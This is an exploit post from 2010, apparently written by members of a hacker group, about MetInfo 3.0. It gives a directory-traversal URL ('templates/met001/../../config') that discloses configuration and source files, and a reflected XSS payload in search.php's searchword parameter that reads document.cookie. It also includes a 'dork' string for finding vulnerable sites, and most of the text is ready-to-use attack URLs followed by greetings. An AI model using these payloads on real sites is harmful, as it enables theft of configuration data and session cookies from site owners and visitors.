# Exploit Title: metinfo3.0 Mullti Vulnerability
# Date : 10-11-2010
# Author : anT!-Tr0J4n
# Version : 3.0
#DorK : Powered by MetInfo 3.0
# Home : www.Dev-PoinT.com : http://milw0rm.ws
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
Vendor? : http://www.metinfo.cn/
#Greetz : Dev-PoinT.com ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l
#special thanks to milw0rm.ws team : r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu
========================================================
metinfo3.0 source code disclosure Vulnerability
========================================================
[>] exploit ->
[+] http://localhost/metinfo/templates/met001/../../ [file disclosure]
EX :
[+] http://localhost/metinfo/templates/met001/../../config
======================================================
[>] metinfo3.0 XSS Vulnerability
======================================================
[>] exploit -> XSS Vulnerability
http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=[XSS]
http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1<script>alert(document.cookie)</script>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] Site : Inj3ct0r.com
[+] Support e-mail : submit[at]inj3ct0r.com
[+] I'm anT!-Tr0J4n member from Inj3ct0r Team